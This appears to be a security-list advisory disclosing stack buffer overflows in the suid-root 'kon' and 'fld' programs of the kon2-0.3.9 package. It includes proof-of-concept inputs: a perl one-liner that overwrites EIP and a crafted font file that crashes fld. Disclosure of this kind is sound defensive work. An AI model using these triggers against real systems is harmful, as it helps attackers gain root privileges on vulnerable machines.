Problems with "kon2" package

[chris () FERRET LMH OX AC UK (Chris Evans)]

Hi,

I had reason to investigate the security of a package called "kon2" - a
program for displaying Japanese on the console I'm led to believe.

SUMMARY
=======

kon2-0.3.9

In the version I briefly examined, there were three suid-root execuatbles

- kon
- fld
- newvc

Here are details of breakages in "kon" and "fld". I believe both lead to
root compromise, although I haven't verified if something has dropped root
privileges or not at the time of the overflows.

DEMOS
=====

No discussion of code flaws today, because boring stack overflows are
being used

1) kon

kon VGA -StartupMessage `perl -e 'print "A"x10000'`

=> segfault with EIP 0x41414141

2) fld

a) Create file "read.me.and.die", contents:

CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"

...
BUT substitute each sequence of A's for 200 A's

b) fld -t bdf read.me.and.die

I don't get a clean 0x41414141 stacktrace but that's just a minor detail,
and these things are always circumventable (I think a pointer gets
toasted inbetween two char[] buffers on the stack)

Cheers
Chris